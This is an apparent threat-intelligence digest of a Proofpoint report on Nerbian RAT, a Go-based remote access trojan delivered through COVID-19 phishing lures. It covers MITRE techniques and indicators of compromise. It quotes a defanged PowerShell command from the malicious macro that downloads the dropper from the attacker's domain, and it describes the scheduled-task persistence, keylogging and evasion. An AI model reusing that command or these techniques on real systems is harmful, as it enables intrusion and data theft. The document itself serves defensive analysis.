Threat Research

Nerbian RAT Using COVID-19 Themes Features Sophisticated Evasion Techniques | Proofpoint US

Securonix

Proofpoint profiles Nerbian RAT, a Go-based malware with aggressive anti-analysis and evasion capabilities that uses COVID-19 themes to lure victims. The attack chain starts with a maldoc phishing email, drops a Go-based loader UpdateUAV.exe, which then retrieves MoUsoCore.exe (the RAT) and establishes persistence via a scheduled task, with encrypted C2 communications.
#NerbianRAT #MoUsoCore #UpdateUAV #WorldHealthOrganization #FernandoTechnical

Keypoints

  • Nerbian RAT is a multi-stage, OS-agnostic Go malware with substantial anti-analysis and anti-reversing capabilities spread across several components.
  • The campaign uses maldoc phishing claiming to be WHO COVID-19 guidance, delivering a macro-enabled Word attachment.
  • The dropper UpdateUAV.exe downloads the RAT payload MoUsoCore.exe and is UPX packed to reduce size.
  • There are extensive anti-debug, anti-VM, and anti-forensics checks, including IsDebuggerPresent and VM/host checks, woven into the dropper.
  • Nerbian RAT features encrypted configuration, keylogging, and screen capture, with C2 communications over SSL and structured POST data.
  • Persistence is achieved via a scheduled task (MicrosoftMouseCoreWork) that starts the RAT hourly.
  • IP/domain indicators include 185.121.139.249 and fernandestechnical.com with health_check.php, alongside various file hashes and filenames associated with the samples.

MITRE Techniques

  • [T1566.001] Phishing – Malicious emails delivering a macro-laden Word attachment; ‘The emails claimed to be representing the World Health Organization (WHO) with important information regarding COVID-19.’
  • [T1059.001] PowerShell – The macro leads to a PowerShell sequence including ‘powershell IWR -Uri hxxps://www[.]fernandestechnical[.]com/pub/media/gitlog -OutFile C:Users[username]AppDataRoamingUpdateUAV.exe’
  • [T1105] Ingress Tool Transfer – The batch-driven IWR download and subsequent drop of UpdateUAV.exe onto the host; ‘It renames the downloaded file to UpdateUAV.exe, and drops it into: C:Users[current user]AppDataRoamingUpdateUAV.exe’
  • [T1053.005] Scheduled Task – Establishment of a scheduled task named ‘MicrosoftMouseCoreWork’ to start the RAT hourly; ‘Next, the dropper will attempt to establish a scheduled task named MicrosoftMouseCoreWork to start the RAT payload hourly to establish persistence.’
  • [T1027] Obfuscated/Compressed Files – The payload UpdateUAV.exe is UPX packed; ‘UPX packed. Unpacked, the file is 6.6MB in total.’
  • [T1056.001] Keylogging – The RAT can log keystrokes and write encrypted data to rev.sav; ‘The RAT appears to have the ability to log keystrokes and appears to write them, encrypted, to the rev.sav file mentioned in the configuration settings above.’
  • [T1113] Screen Capture – RAT uses Go libraries and a screenshot repository to enable screen capture; ‘This repo is a Go library for performing screen captures on a variety of different operating systems.’

Indicators of Compromise

  • [Filename] IOCs – covid-19.doc and UpdateUAV.exe (from the indicators table for the maldoc and dropper)
  • [MD5 Hash] IOCs – d7888fea6047b662a30bf00edac4c3ee, 9cca59eec5af63e42cd845b67cf6df89
  • [SHA1 Hash] IOCs – 8137670512be55796f612e41602f505955b0bb0c, 178aad6c7918cc495a908944e79143a913630890
  • [SHA256 Hash] IOCs – ee1bbd856bf72a79221baa0f7e97aafb6051129905d62d74a37ae7754fccc3db, 1b8c9e7c150bacd466fbe7f12b39883821f23b67cae0a427a57dc37e5ea4390f
  • [Domain] IOCs – www.fernandestechnical.com
  • [URL] IOCs – hxxps://www[.]fernandestechnical[.]com/pub/health_check.php
  • [IP] IOCs – 185.121.139.249

Read more: https://www.proofpoint.com/us/blog/threat-insight/nerbian-rat-using-covid-19-themes-features-sophisticated-evasion-techniques